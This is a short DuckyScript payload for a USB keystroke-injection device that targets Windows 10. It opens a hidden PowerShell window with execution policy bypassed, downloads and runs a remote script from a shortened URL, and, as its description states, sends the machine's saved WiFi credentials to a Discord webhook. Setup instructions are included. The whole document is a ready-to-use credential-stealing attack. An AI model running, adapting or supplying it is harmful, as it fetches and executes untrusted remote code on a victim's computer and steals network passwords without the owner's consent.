REM Title: beigeworm's saved WiFi to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects saved WiFi info and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_wifi_to_dc | iex
ENTER


